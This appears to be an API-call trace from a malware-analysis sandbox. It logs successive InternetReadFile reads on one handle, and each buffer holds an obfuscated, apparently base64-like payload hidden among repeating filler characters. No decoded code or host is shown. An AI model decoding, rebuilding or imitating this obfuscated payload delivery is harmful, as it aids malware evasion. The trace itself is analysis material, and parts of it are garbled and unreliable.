⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ6мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎVмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ1мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞâ­
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: â™â˜±âŸŽâ¡³á³šË•ÒŽIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎNмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎â
request_handle: 0x00cc000c
1 1 0

InternetReadFile

